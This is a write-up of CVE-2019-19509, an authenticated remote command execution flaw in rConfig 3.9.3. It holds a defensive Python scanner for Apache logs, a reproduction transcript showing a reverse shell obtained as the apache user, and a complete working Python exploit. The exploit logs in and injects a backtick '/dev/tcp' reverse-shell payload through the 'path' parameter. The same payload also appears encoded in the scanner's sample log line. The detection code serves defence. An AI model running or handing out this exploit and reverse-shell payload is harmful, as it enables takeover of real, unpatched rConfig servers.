(CVE-2019-19509) rConfig v3.9.3 Authenticated Remote Command Execution Vulnerability
====================================================================================

2021-07-15 20:02:31
    
1. Vulnerability overview
-------------------------
    
rConfig is an open-source network configuration management utility. rConfig 3.9.3 passes the 'path' parameter straight to the 'exec' function without any filtering, so a remote attacker who can send a GET request to ajaxArchiveFiles.php can execute system commands on the server. The handler sits behind the application's login, so a valid rConfig account is required (the exploit below first authenticates through userprocess.php), and the command runs with the privileges of the web server process, which is why the reproduction below lands a shell as the 'apache' user.
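A defender's counterpart to the description above, added here as example code (it is not from the original post or from rConfig): it scans Apache combined-format access log lines for requests to the vulnerable ajaxArchiveFiles.php handler whose decoded `path` parameter carries shell metacharacters. The log lines, IP addresses and user agents are constructed for this example.

```python
"""Flag CVE-2019-19509 exploitation attempts in Apache access logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Handler named in the advisory; its 'path' parameter reaches exec() unfiltered.
VULN_ENDPOINT = "/lib/ajaxHandlers/ajaxArchiveFiles.php"
# Shell metacharacters that never belong in a legitimate archive path.
SHELL_META = re.compile(r"[`;|&$<>\n]")
# Apache combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_path_value(url):
    """Decoded 'path' value if the URL hits the vulnerable handler with shell metacharacters, else None."""
    parts = urlsplit(url)
    if parts.path != VULN_ENDPOINT:
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("path", []):
        # parse_qs decoded once; a second pass also surfaces double-encoded probes.
        decoded = unquote(value)
        if SHELL_META.search(decoded):
            return decoded
    return None


def scan_log(lines):
    """Return (client_ip, timestamp, decoded_path) for every matching log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        decoded = suspicious_path_value(m.group("url"))
        if decoded is not None:
            hits.append((m.group("ip"), m.group("ts"), decoded))
    return hits


# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jul/2021:20:02:31 +0000] "GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=%60bash%20-i%3E%26%20/dev/tcp/192.0.2.20/8081%200%3E%261%60&ext=random HTTP/1.1" 200 12 "-" "python-requests/2.22.0"',
    '192.0.2.11 - - [15/Jul/2021:20:03:00 +0000] "GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=/home/rconfig/data/backups&ext=zip HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [15/Jul/2021:20:03:05 +0000] "GET /dashboard.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, path in scan_log(SAMPLE_LOG):
        print("[!] {0} at {1}: path={2!r}".format(ip, ts, path))
```

Only the first sample line is reported; a legitimate archive path and a request to another page pass through untouched.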
    
2. Affected versions
--------------------
    
rConfig v3.9.3
    
3. Reproduction
---------------
    
    python3 CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
    # rconfig - CVE-2019-19509 - Web authenticated RCE
    # [+] Logged in successfully, triggering the payload...
    # [+] Check your listener !
    # ...
    # $ nc -nvlp 8081
    # listening on [any] 8081 ...
    # connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458
    # bash: no job control in this shell
    # bash-4.2$ id
    # id
    # uid=48(apache) gid=48(apache) groups=48(apache)
    # bash-4.2$ 
    
> CVE-2019-19509.py
    
    #!/usr/bin/python3

    # Exploit Title: rConfig <= v3.9.3 Authenticated Remote Code Execution
    # Date: 07/11/2019
    # CVE-2019-19509
    # Exploit Author: vikingfr
    # Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
    # Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
    # Version: tested v3.9.3
    # Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
    #
    # Notes : If you want to reproduce in your lab environment follow those links :
    # http://help.rconfig.com/gettingstarted/installation
    # then
    # http://help.rconfig.com/gettingstarted/postinstall

    import requests
    import sys
    import urllib.parse
    from requests.packages.urllib3.exceptions import InsecureRequestWarning

    # The lab target uses a self-signed certificate, so TLS warnings are silenced.
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

    print("rconfig - CVE-2019-19509 - Web authenticated RCE")

    if len(sys.argv) != 6:
        print("[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort")
        sys.exit(1)

    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    ip = sys.argv[4]
    port = sys.argv[5]
    # Backtick command substitution: the unfiltered 'path' value reaches exec().
    payload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port)

    # A session keeps the login cookie for the follow-up requests; certificate
    # checking is disabled on the session so every request uses the same setting.
    request = requests.session()
    request.verify = False

    login_info = {
        "user": username,
        "pass": password,
        "sublogin": 1
    }

    login_request = request.post(
        target + "/lib/crud/userprocess.php",
        login_info,
        allow_redirects=True
    )

    # dashboard.php answers 200 to an authenticated session and redirects (302) otherwise.
    dashboard_request = request.get(target + "/dashboard.php", allow_redirects=False)

    if dashboard_request.status_code == 200:
        print("[+] Logged in successfully, triggering the payload...")
        encoded_request = target + "/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
        print("[+] Check your listener !")
        exploit_req = request.get(encoded_request)

    elif dashboard_request.status_code == 302:
        print("[-] Wrong credentials !")
        sys.exit(1)

    else:
        print("[-] Unexpected response from dashboard.php: {0}".format(dashboard_request.status_code))
        sys.exit(1)
    
    